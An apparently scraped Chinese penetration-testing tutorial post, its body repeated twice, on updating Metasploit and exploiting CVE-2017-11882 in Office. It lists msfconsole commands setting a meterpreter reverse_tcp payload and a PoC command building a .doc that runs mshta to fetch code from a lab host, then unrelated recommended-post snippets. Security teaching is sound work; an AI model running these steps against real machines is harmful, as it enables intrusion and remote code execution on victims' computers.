4.Metasploit框架更新
Metasploit 进阶第二讲 框架更新
EDB平台-互联网安全漏洞库
Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况,同时帮助安全研究人员及渗透测试工程师进行更好的安全测试工作。
exploits:漏洞信息
papers:文章
GHDB: Google hacking
shellcodes:填充数据
CVE-2017-11882介绍
CVE-2017-11882Ofice远程代码执行漏洞:
由Microsoft office中的公式编辑器造成,该模块以OLE(Object Linking and Embedding,对象链接与嵌入)技术将公式嵌入在Office文档内,由于编辑器没有对名称长度进行校验,导致缓冲区溢出,若攻击者通过构造特殊字符,office无法正确处理内存对象,成功利用该漏洞的攻击者将能以当前用户身份在目标操作系统执行任意代码。
完美无弹窗,无异常,影响office全版本。
CVE和MS:
CVE是Common Vulnerabilities and Exposures的缩写,意思是公共漏洞及披露。它是一个漏洞字典,由MITRE维护,给每个暴露出来漏洞给一个公共的名称。可以在cve.mitre.org/cve/index.html中查看漏洞列表。
MS是微软维护的自身的漏洞列表。可以在technet.microsoft.com/en-
us/security/bulletins查找最新的各种相关信息。
由于两者标准不统一,为了更好对应,MITRE提供一个对应列表cve.mitre.org/data/refs/refmap/source-MS.html。
MSF添加exploit及更新Metasploit框架
添加exploit:
1.将下载的rb文件放入对应的文件夹下
2.执行reload_all或重新启动MSF
更新metasploit框架:
apt update;apt install metasploit-framework
实操:利用CVE-2017-11882攻击目标主机
MSF:
search 2017_11882
use exploit/windows/...
info
show options
set uripath/
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.24.137
run
生成POC程序(带有shell的doc文件):
python CVE-2017-11882.py -c“mshta
http://192.168.24.137:8080/"-o11882.doc
其他POC程序生成:
https://github.com/Ridter/CVE-2017-11882
python CVE-2017-11882.py-c"cmd.exe/c
calc.cxe" –o 11882.doc
metasploit攻击win8实例
Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332、MS14-064):
OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。
Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008
SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012
Gold/R2,Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞,远程攻击者利用此漏洞构造特殊的网页,用户使用IE浏览器查看网页时允许远程执行任意代码。
可能会遇到的问题:
1.Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)
lsof-i:4444 -> kill -9 PID(man lsof -> man kill)
2.注意查看报错信息,多检索
metasploit框架打开方式:
msfconsole 启动命令行模式
armitage 启动图形化界面方式
Metasploit 进阶第二讲
框架更新
01 Exploit_db平台介绍
02 MSF添加exploit更新MSF
03 CVE-2017-11882利用实例
04合天网安实验室攻击win8实例
EDB平台-互联网安全漏洞库
Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况,同时帮助安全研究人员及渗透测试工程师进行更好的安全测试工作。
exploits:漏洞信息
papers:文章
GHDB: Google hacking
shellcodes:填充数据
CVE-2017-11882介绍
CVE-2017-11882Ofice远程代码执行漏洞:
由Microsoft office中的公式编辑器造成,该模块以OLE(Object Linking and Embedding,对象链接与嵌入)技术将公式嵌入在Office文档内,由于编辑器没有对名称长度进行校验,导致缓冲区溢出,若攻击者通过构造特殊字符,office无法正确处理内存对象,成功利用该漏洞的攻击者将能以当前用户身份在目标操作系统执行任意代码。
完美无弹窗,无异常,影响office全版本。
CVE和MS:
CVE是Common Vulnerabilities and Exposures的缩写,意思是公共漏洞及披露。它是一个漏洞字典,由MITRE维护,给每个暴露出来漏洞给一个公共的名称。可以在cve.mitre.org/cve/index.html中查看漏洞列表。
MS是微软维护的自身的漏洞列表。可以在technet.microsoft.com/en-
us/security/bulletins查找最新的各种相关信息。
由于两者标准不统一,为了更好对应,MITRE提供一个对应列表cve.mitre.org/data/refs/refmap/source-MS.html。
MSF添加exploit及更新Metasploit框架
添加exploit:
1.将下载的rb文件放入对应的文件夹下
2.执行reload_all或重新启动MSF
更新metasploit框架:
apt update;apt install metasploit-framework
实操:利用CVE-2017-11882攻击目标主机
MSF:
search 2017_11882
use exploit/windows/...
info
show options
set uripath/
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.24.137
run
生成POC程序(带有shell的doc文件):
python CVE-2017-11882.py -c“mshta
http://192.168.24.137:8080/"-o11882.doc
其他POC程序生成:
https://github.com/Ridter/CVE-2017-11882
python CVE-2017-11882.py-c"cmd.exe/c
calc.cxe" –o 11882.doc
合天网安实验室:metasploit攻击win8实例
Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332、MS14-064):
OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。
Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008
SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012
Gold/R2,Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞,远程攻击者利用此漏洞构造特殊的网页,用户使用IE浏览
器查看网页时允许远程执行任意代码。
可能会遇到的问题:
- Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)
lsof-i:4444 -> kill -9 PID(man lsof -> man kill)
2.注意查看报错信息,多检索
metasploit框架打开方式:
msfconsole 启动命令行模式
armitage 启动图形化界面方式

4.Metasploit框架更新的更多相关文章
- iOS将自己的框架更新到cocopods上
第一步 把自己的框架更新到github 上,为了提交地址给他人下载.这里就不详细介绍如何把项目更新到github上了 第二步 这个时候我们的项目已经挂在github上了我们需要给本地的项目新建一个Po ...
- iOS中 如何将自己的框架更新到cocopods上 韩俊强的博客
每日更新关注:http://weibo.com/hanjunqiang 新浪微博! 为了更方便的集成第三方框架有了cocopods 的, 当我们有了相对比较好的框架的时候如何更新到cocopods ...
- 将自己的框架更新到cocopods上
为了更方便的集成第三方框架有了cocopods 的, 当我们有了相对比较好的框架的时候如何更新到cocopods 供他人参考呢? 下面我一步一步带大家开源自己的框架. 第一步 把自己的框架更新到git ...
- 认识Metasploit框架
Metasploit基础 认识Metaspliot框架 Metaspliot(MSF)渗透测试框架,提供众多的接口.选项.变量.模块以供渗透工作人员使用它完成一系列的渗透攻击. 渗透攻击(Expl ...
- BitAdminCore框架更新日志20180531
索引 NET Core应用框架之BitAdminCore框架应用篇系列 框架演示:http://bit.bitdao.cn 框架源码:https://github.com/chenyinxin/coo ...
- BitAdminCore框架更新日志20180529
索引 NET Core应用框架之BitAdminCore框架应用篇系列 框架演示:http://bit.bitdao.cn 框架源码:https://github.com/chenyinxin/coo ...
- BitAdminCore框架更新日志20180523
20180523更新内容 本次更新两个内容,一是增加视频处理功能,二是增加定时服务功能. 视频处理 定时服务 BitAdminCore框架,用最少的代码,实现最多的功能 本次新暂未发布,后续有空发布 ...
- BitAdminCore框架更新日志20180522
20180522更新内容 本次更新增加了excel导入导出示例,QuerySuite组件实现导出导出,用最少代码,做最多的事,代码就是如此简单. 计划修改内容 1.人脸登录功能需要重构,目前功能不完善 ...
- BitAdminCore框架更新日志20180519
20180519更新内容 昨天更新的版本,早上自己下载下来发现创建项目不成功. 这个问题已经多次出现,主要是cookiecutter编码问题,项目引用大量外部js文件,部分文件在复制的时候编码较验不通 ...
随机推荐
- Java基础--Arrays类
Arrays工具类:用来操作数组(比如排序和搜索)的各种方法 常用方法: 使用二分法查找 Arrays.binarySearch(int[]array,int value); 数组内容转换成字符串的形 ...
- 第六章、Vue项目预热
6-5. (1). (2).引入reset.css及border.css (3).解决手机点击延迟300ms的问题 a.安装 b.引入fastclick 6-2.项目的整体架构 src--->整 ...
- springmvc与swagger2
首先呢我们导入相关的jar包文件 为了方便copy我copy一份 <!-- 导入java ee jar 包 --> <dependency> ...
- redis环境搭建及一主二从三哨兵模式配置
一.单机redis环境搭建 1.安装: OS:linux redhat6.5 下载redis 官网下载链接:https://redis.io/download 把安装包上传到服务器,进行解压 [roo ...
- idea新建springboot项目
不多说废话,直接进入正题,按照下面的步骤创建一个springboot项目一般不会出错,当然不排除可能会有一些脸黑的,不过应该问题不大. 第一步,如果你是在已有的项目里面,新建一个springboot项 ...
- django 博客搭建
comment1.安装django pip install django 2.创建项目 django-admin startproject mysite 3.在mysite文件夹下创建app pyth ...
- Java Grammar(二):运算符
运算符简介 计算机自打诞生以来,用作最多的就是进行计算,而计算离不开运算符,所以运算符在我们的Java语言中的地位举足轻重,我们现在就来了解一下Java给我们提供的运算符. 从运算的元素的个数来区分, ...
- 基于 HTML + WebGL 结合 23D 的疫情地图实时大屏 PC 版【转载】
前言 2019年12月以来,湖北省武汉市陆续发现了多例肺炎病例,现已证实为一种新型冠状病毒感染引起的急性呼吸道传染病并蔓延全国,肺炎疫情牵动人心,人们每天起来第一件事变成了关注疫情进展,期望这场天灾早 ...
- computed 里面 不能写箭头函数 都要写 function () {} 否则页面会都不显示
computed 里面 不能写箭头函数 都要写 function () {} 否则页面会都不显示
- Crypto++ 无法解析的外部符号 CryptoPP::AssignIntToInteger
预处理器定义中添加:CRYPTOPP_NO_ASSIGN_TO_INTEGER 方案出自:https://github.com/weidai11/cryptopp/issues/389